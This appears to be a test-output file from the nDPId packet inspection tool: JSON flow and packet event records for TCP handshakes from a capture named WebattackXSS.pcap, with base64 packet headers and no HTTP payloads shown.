-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":2,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347310567,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2hoggEnh4ReY56AScSBc+gAAAgQFtAQCCAoD5Ag7ATo2xQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":3,"flow_last_seen":1499347310567,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347310567,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0riRAAD4GF7SsEAABwKgKMtoaAFDhF5jnIIBJ4oAQAOX8AQAAAQEICgE6NsUD5Ag7"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347313106,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313106,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80LNAAD4G9RysEAABwKgKMto0AFBr7OnzAAAAAKACchD0JAAAAgQFtAQCCAoBOjlAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":2,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347313106,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2jRgNfxEa+zp9KAScSCJ7wAAAgQFtAQCCAoD5Aq2ATo5QAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":3,"flow_last_seen":1499347313106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347313106,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00LRAAD4G9SOsEAABwKgKMto0AFBr7On0YDX8RYAQAOUo9wAAAQEICgE6OUAD5Aq2"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347186286,"flow_last_seen":1499347191666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347187548,"flow_last_seen":1499347192666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347188799,"flow_last_seen":1499347194667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347190051,"flow_last_seen":1499347195667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347191299,"flow_last_seen":1499347196667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2881,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347192547,"flow_last_seen":1499347197669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347313110,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347314358,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347314358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55874,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wpZAAD4GAzqsEAABwKgKMtpCAFAntfjvAAAAAKACchAoGQAAAgQFtAQCCAoBOjp5AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":2,"flow_last_seen":1499347314358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347314358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2kLsSHY8J7X48KAScSC2nwAAAgQFtAQCCAoD5AvvATo6eQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1499347314359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347314359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wpdAAD4GA0GsEAABwKgKMtpCAFAntfjw7Eh2PYAQAOVVpwAAAQEICgE6OnkD5Avv"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347315631,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347315631,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55888,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2896,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8y+VAAD4G+eqsEAABwKgKMtpQAFAKdfBSAAAAAKACchBMqgAAAgQFtAQCCAoBOju3AAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":2,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347315631,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2lDsZegJCnXwU6AScSBoCAAAAgQFtAQCCAoD5A0tATo7twEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":3,"flow_last_seen":1499347315631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347315631,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0y+ZAAD4G+fGsEAABwKgKMtpQAFAKdfBT7GXoCoAQAOUHEAAAAQEICgE6O7cD5A0t"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347318180,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347318180,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"ABm5CmnxAMGxFOsxCABFAAA81llAAD4G73asEAABwKgKMtpqAFAYI+htAAAAAKACchBESgAAAgQFtAQCCAoBOj40AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":2,"flow_last_seen":1499347318180,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347318180,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2mqVHZfsGCPobqAScSAEkQAAAgQFtAQCCAoD5A+qATo+NAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":3,"flow_last_seen":1499347318181,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347318181,"pkt":"ABm5CmnxAMGxFOsxCABFAAA01lpAAD4G732sEAABwKgKMtpqAFAYI+hulR2X7YAQAOWjmAAAAQEICgE6PjQD5A+q"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347319466,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347319466,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55928,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2926,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vPhAAD4GCNisEAABwKgKMtp4AFBaBoOOAAAAAKACchBl9gAAAgQFtAQCCAoBOj92AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":2,"flow_last_seen":1499347319466,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347319466,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ni9VjICWgaDj6AScSBirAAAAgQFtAQCCAoD5BDsATo\/dgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":3,"flow_last_seen":1499347319467,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347319467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vPlAAD4GCN+sEAABwKgKMtp4AFBaBoOPvVYyA4AQAOUBtAAAAQEICgE6P3YD5BDs"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347320712,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347320712,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55942,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8tK5AAD4GESKsEAABwKgKMtqGAFAqvPQDAAAAAKACchAjhgAAAgQFtAQCCAoBOkCtAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":2,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347320712,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2oZaSFgWKrz0BKAScSBb\/wAAAgQFtAQCCAoD5BIjATpArQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":3,"flow_last_seen":1499347320712,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347320712,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0tK9AAD4GESmsEAABwKgKMtqGAFAqvPQEWkhYF4AQAOX7BgAAAQEICgE6QK0D5BIj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347323234,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323234,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55968,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CttAAD4GuvWsEAABwKgKMtqgAFDxkUn\/AAAAAKACchAEJAAAAgQFtAQCCAoBOkMkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":2,"flow_last_seen":1499347323234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347323234,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2qDnEfYn8ZFKAKAScSAPSwAAAgQFtAQCCAoD5BSaATpDJAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":3,"flow_last_seen":1499347323235,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347323235,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CtxAAD4GuvysEAABwKgKMtqgAFDxkUoA5xH2KIAQAOWuUgAAAQEICgE6QyQD5BSa"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347195099,"flow_last_seen":1499347200670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2965,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347196341,"flow_last_seen":1499347201670,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347323705,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 